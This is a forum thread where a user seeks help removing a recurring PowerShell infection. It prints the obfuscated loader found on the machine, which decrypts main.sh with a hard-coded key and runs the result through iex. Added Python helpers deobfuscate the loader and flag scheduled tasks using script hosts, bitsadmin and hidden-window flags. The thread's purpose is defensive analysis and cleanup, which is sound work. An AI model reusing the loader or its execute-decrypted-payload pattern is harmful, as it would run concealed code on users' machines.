Need help with suspicious "Behavior:Win32/SuspCopy.B"


Hello,

The system of a colleague is trying to block various attempts of the threat classified as "Behavior:Win32/SuspCopy.B"; I found that the antivirus blocks it, but after some time it finds it again; the threat creates a random directory under the path C:\Users\[my colleague account]\AppData\Roaming; if I try, I can delete the files inside but not the directory; as a side effect, every time the antivirus finds a new attempt, a pop-up shows that a particular .tmp file is not found: the pop-up is a WSH pop-up and I suppose a VBScript is executed when this issue occurs.

One of the files that I have found is a PowerShell script like this:

try{Import-Certificate:Import-StartLayout
Get-PSSessionConfiguration:Import-BinaryMiLog
Unregister-UevTemplate:Set-AppvPublishingServer}catch{

$kJzClF="pGCbAoRKiYYwsyNMeGECrJorQrjClQsjjShbNHddeVmNKUleMplzOrlXvLi" -replace "QMO|GCbA|RKiYY|syNM|GECrJo|QrjClQ|jjS|bNHdd|VmNKU|eMplzOr|XvLi";
try{Add-AppxPackage:Enable-PSBreakpoint
Invoke-CommandInDesktopPackage:Get-RunspaceDebug
Clear-UevConfiguration:Debug-Process}catch{}
$NJeDKxLmAJtftkbNcthp=Get-WmiObject win32_process -Filter "name=""powershell.exe""" | where {$_.CommandLine -match "iXxpLQjg"};
if ($NJeDKxLmAJtftkbNcthp[1] -eq $null){
$pAWzZWnnbaODWSIlGcI=@(1..16);
$wXXale=[System.Runtime.InteropServices.Marshal]
$FJZARstrPhaUvJ= Get-Content "main.sh"
$BkbxfgOkWGcdUJu= ConvertTo-SecureString $FJZARstrPhaUvJ -key $pAWzZWnnbaODWSIlGcI;
$qOXGbSpmuvBSmvlkW = $wXXale::SecureStringToBSTR($BkbxfgOkWGcdUJu);
try{Show-EventLog:Get-WheaMemoryPolicy
Get-NonRemovableAppsPolicy:Set-AppLockerPolicy
Set-AppxDefaultVolume:Disable-PSSessionConfiguration}catch{$upd='iXxpLQjg';}
$zApeVzJjF = $wXXale::PtrToStringAuto($qOXGbSpmuvBSmvlkW);
try{Write-Host:Publish-AppvClientPackage
Set-LocalUser:Invoke-WmiMethod
Set-WmiInstance:New-WindowsImage}catch{}
$zApeVzJjF -replace "MJqsMVgvkpp" | iex;}}

I also tried to do a scan with Microsoft Security Scanner, but without success.

Does someone have any idea how I could eradicate this threat?

 

--

Regards
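The posted script is a small loader: the first line rebuilds a string by deleting junk tokens with `-replace` (the literal resolves to `powershell`), the WMI query counts running powershell.exe processes whose command line contains the marker `iXxpLQjg` so that only one copy runs, `main.sh` is decrypted with ConvertTo-SecureString and a hard-coded key of the bytes 1..16, and the result is piped to `iex`. The try/catch blocks of colon-joined cmdlet names only throw and get swallowed. The Python below is an added static-analysis helper written for this thread, not code from the post or from Microsoft; it emulates PowerShell's `-replace` on the literals, lists the junk patterns, recovers the static key and flags the behaviours above. The embedded `POSTED_SCRIPT` sample is the loader logic copied from the post with the padding blocks removed.

```python
import re

# Constructed sample: the lines of the posted script that carry the loader logic,
# with the variable names exactly as posted. The try{...}catch{} blocks of bogus
# cmdlet names are left out: they only throw and are swallowed (padding).
POSTED_SCRIPT = r'''
$kJzClF="pGCbAoRKiYYwsyNMeGECrJorQrjClQsjjShbNHddeVmNKUleMplzOrlXvLi" -replace "QMO|GCbA|RKiYY|syNM|GECrJo|QrjClQ|jjS|bNHdd|VmNKU|eMplzOr|XvLi";
$NJeDKxLmAJtftkbNcthp=Get-WmiObject win32_process -Filter "name=""powershell.exe""" | where {$_.CommandLine -match "iXxpLQjg"};
if ($NJeDKxLmAJtftkbNcthp[1] -eq $null){
$pAWzZWnnbaODWSIlGcI=@(1..16);
$wXXale=[System.Runtime.InteropServices.Marshal]
$FJZARstrPhaUvJ= Get-Content "main.sh"
$BkbxfgOkWGcdUJu= ConvertTo-SecureString $FJZARstrPhaUvJ -key $pAWzZWnnbaODWSIlGcI;
$qOXGbSpmuvBSmvlkW = $wXXale::SecureStringToBSTR($BkbxfgOkWGcdUJu);
$zApeVzJjF = $wXXale::PtrToStringAuto($qOXGbSpmuvBSmvlkW);
$zApeVzJjF -replace "MJqsMVgvkpp" | iex;}}
'''

# "literal" -replace "pattern": the real string is rebuilt by deleting junk tokens
REPLACE_LITERAL = re.compile(r'"([^"\n]*)"\s+-replace\s+"([^"\n]*)"')
REPLACE_PATTERN = re.compile(r'-replace\s+"([^"\n]*)"')

# Behaviours worth flagging; each regex is matched case-insensitively, as PowerShell would.
INDICATORS = {
    "single-instance check via WMI process command line": r"win32_process.*CommandLine\s+-match",
    "ConvertTo-SecureString with a hard-coded -key": r"ConvertTo-SecureString.*-key",
    "payload read from a file next to the script": r'Get-Content\s+"[^"]+"',
    "decrypted text piped to Invoke-Expression": r"\|\s*iex\b|Invoke-Expression",
}


def ps_replace(text, pattern, replacement=""):
    """Emulate PowerShell's -replace operator: regex, case-insensitive, all matches."""
    return re.sub(pattern, replacement, text, flags=re.IGNORECASE)


def resolve_replace_literals(script):
    """Map every obfuscated string literal to the value the script computes at run time."""
    return {obf: ps_replace(obf, pattern) for obf, pattern in REPLACE_LITERAL.findall(script)}


def replace_patterns(script):
    """All junk-token patterns in the script, including those applied to variables."""
    return REPLACE_PATTERN.findall(script)


def static_securestring_key(script):
    """Recover the AES key bytes when ConvertTo-SecureString -key points at an @(a..b) range."""
    m = re.search(r"-key\s+\$(\w+)", script, flags=re.IGNORECASE)
    if not m:
        return None
    rng = re.search(r"\$" + re.escape(m.group(1)) + r"\s*=\s*@\((\d+)\.\.(\d+)\)", script)
    if not rng:
        return None
    lo, hi = int(rng.group(1)), int(rng.group(2))
    return list(range(lo, hi + 1))


def find_indicators(script):
    """Names of the INDICATORS whose regex matches somewhere in the script."""
    return [name for name, rx in INDICATORS.items() if re.search(rx, script, flags=re.IGNORECASE)]


if __name__ == "__main__":
    for obf, clean in resolve_replace_literals(POSTED_SCRIPT).items():
        print(f"{obf[:24]}... -> {clean!r}")
    print("junk patterns:", replace_patterns(POSTED_SCRIPT))
    print("static key bytes:", static_securestring_key(POSTED_SCRIPT))
    for name in find_indicators(POSTED_SCRIPT):
        print("indicator:", name)
```

Because the key is the fixed byte sequence 1..16 and sits in the script itself, the encrypted `main.sh` found next to it can be decoded by an analyst in the same way the loader does, without ever piping the result to `iex`; the second junk pattern (`MJqsMVgvkpp`) is what the decrypted text is cleaned with, so it is a useful string to search other copies of the script for.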

Interesting, does your colleague know the source of the script? Are you able to quarantine the file from the Defender ATP console?

Hello @rs8091 

No, my colleague doesn't know how her system got infected. We activated the preview of Microsoft Defender for Endpoint P1 and I can see this:

 

[Image: Threat 1.png] [Image: Threat 2.png]

These are not generated by that file, but I have seen that in many random directories that the threat creates there is always a PowerShell file with that code inside.

I don't know if I can quarantine it.

Any help is appreciated.

 

Thanks.

Hello @rs8091 

 

thanks for your reply. I've seen the link and also looked on our dashboard, but I don't see the possibility; we have activated the preview of Microsoft 365 Defender for Endpoint P1, I d.

I also see that the script that I copied on this forum is not shown in the alert tree.

 

From what I see today, in my colleague's C:\Users\[colleague_account]\AppData\Roaming there is a directory "obUwHjQXC" that has the following files, as in the image:

 

[Image: Threat 3.png]

I also see that every 30/60 minutes the svchost.temp is refreshed; also, I suppose that when Defender recognizes the infection, the virus is blocked and so the dialog in the image starts:

 

[Image: Threat 4.png]

I tried to create the directory and the file again, even if empty, because I don't know the contents of the .tmp file; after some time I checked and saw that the recreated file remains empty, and the dialog when the problem shows again is this:

 

[Image: Threat 6.png]

Another thing that I noticed in the past days is that the files 0_[something].log and 1_[something].log change every day: yesterday it was Teams, the day before Chrome.

This is what I see on the endpoint; instead, what I see in the alerts on the Defender dashboard is something like this in the picture (note that it seems that sometimes the virus uses bitsadmin.exe to transfer data, I don't know where):

 

[Image: Threat 5.png]

The time is the same that I find on the PC. I also found many, many entries in Task Scheduler: I have now deactivated all those that I suppose are related to the threat, but I can't see anything that can help me understand what starts the virus.

 

[Image: Threat 8.png]

I hope this helps to understand the problem better.

 

Thanks a lot.
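The post above lists many Task Scheduler entries, a WSH dialog, a svchost.temp that is refreshed every 30/60 minutes and bitsadmin.exe activity, which together point at a scheduled task as the thing that restarts the script. As an added example written for this thread (not code from the thread or from Microsoft), the Python below parses Task Scheduler XML definitions and scores each task on the traits that matter here: a script host or download utility as the command, content run from a user-writable profile path, hidden or encoded-command flags, a script or .tmp file as argument, and a short repetition interval. The three task definitions are constructed, not exported from the affected machine; obUwHjQXC is the directory named in the thread, while launcher.vbs, update.ps1 and the \Updater task name are placeholders.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Script hosts and download/launch utilities that a workstation task rarely needs to run
# directly; bitsadmin.exe is included because the dashboard alerts in the thread mention it.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe",
                "bitsadmin.exe", "cmd.exe", "regsvr32.exe", "rundll32.exe"}
USER_WRITABLE = re.compile(r"\\AppData\\(Roaming|Local)\\|%APPDATA%|%LOCALAPPDATA%|%TEMP%",
                           re.IGNORECASE)
HIDDEN_FLAGS = re.compile(r"(?:^|\s)(?:-w(?:indowstyle)?\s+hidden|-enc\w*|-nop\w*|//B)(?=\s|$)",
                          re.IGNORECASE)
SCRIPT_ARG = re.compile(r"\.(vbs|vbe|js|jse|ps1|bat|cmd|hta|tmp|temp)\b", re.IGNORECASE)

# Constructed task definitions (not exported from the affected machine). The directory name
# obUwHjQXC comes from the thread; launcher.vbs, update.ps1 and \Updater are placeholders.
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Microsoft\Windows\SystemRestore\SR</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>%windir%\system32\srtasks.exe</Command>
    <Arguments>ExecuteScheduledSPPCreation</Arguments>
  </Exec></Actions>
</Task>"""

WSH_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\obUwHjQXC</URI></RegistrationInfo>
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT30M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
    <StartBoundary>2021-09-01T08:00:00</StartBoundary>
  </TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>wscript.exe</Command>
    <Arguments>//B "C:\Users\colleague\AppData\Roaming\obUwHjQXC\launcher.vbs"</Arguments>
  </Exec></Actions>
</Task>"""

PS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Updater</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
    <Arguments>-w hidden -nop -File "C:\Users\colleague\AppData\Roaming\obUwHjQXC\update.ps1"</Arguments>
  </Exec></Actions>
</Task>"""


def iso_duration_minutes(value):
    """Convert a Task Scheduler repetition interval (ISO 8601, e.g. PT30M, PT1H) to minutes."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value or "")
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60


def parse_task(xml_text):
    """Pull the fields that matter for triage out of one task definition."""
    xml_text = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text)  # files on disk carry a UTF-16 declaration
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="(no URI)", namespaces=NS)
    actions = [(ex.findtext("t:Command", default="", namespaces=NS).strip(),
                ex.findtext("t:Arguments", default="", namespaces=NS).strip())
               for ex in root.findall("t:Actions/t:Exec", NS)]
    intervals = [iso_duration_minutes(el.text) for el in root.findall(".//t:Repetition/t:Interval", NS)]
    return {"uri": uri, "actions": actions, "intervals": [i for i in intervals if i is not None]}


def score_task(task):
    """Return the list of suspicious traits found; an empty list means nothing flagged."""
    reasons = []
    for command, arguments in task["actions"]:
        exe = command.replace("/", "\\").split("\\")[-1].strip('"').lower()
        if exe in SCRIPT_HOSTS:
            reasons.append(f"launches script host or LOLBin: {exe}")
        if USER_WRITABLE.search(command) or USER_WRITABLE.search(arguments):
            reasons.append("runs content from a user-writable profile path")
        if HIDDEN_FLAGS.search(arguments):
            reasons.append("uses hidden/non-interactive or encoded-command flags")
        if SCRIPT_ARG.search(arguments):
            reasons.append("argument points at a script or .tmp file")
    short = [i for i in task["intervals"] if i <= 60]
    if short:
        reasons.append(f"repeats every {int(min(short))} minutes")
    return reasons


def triage(task_xmls):
    """Parse and score each task, most suspicious first; tasks with no flagged trait are dropped."""
    results = []
    for xml_text in task_xmls:
        task = parse_task(xml_text)
        reasons = score_task(task)
        if reasons:
            results.append({"uri": task["uri"], "score": len(reasons), "reasons": reasons})
    return sorted(results, key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for hit in triage([BENIGN_TASK, WSH_TASK, PS_TASK]):
        print(f"{hit['uri']}  score={hit['score']}")
        for reason in hit["reasons"]:
            print("   -", reason)
```

On the endpoint the task definitions are XML files under C:\Windows\System32\Tasks (UTF-16 with a byte-order mark, so read them with `open(path, encoding="utf-16")`), and a single task can also be exported with `schtasks /query /tn <name> /xml` or PowerShell's `Export-ScheduledTask`; feeding every file to `triage` gives a ranked list of the entries worth looking at before the rest are re-enabled. A task that scores high here still needs confirming from the dashboard timeline, since legitimate software also installs tasks that run scripts from the profile.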

Hello Marco,
if you click on the events in the ATP console (4th picture), a panel with options on how to remediate/block/quarantine the files should open on the right. Is it available?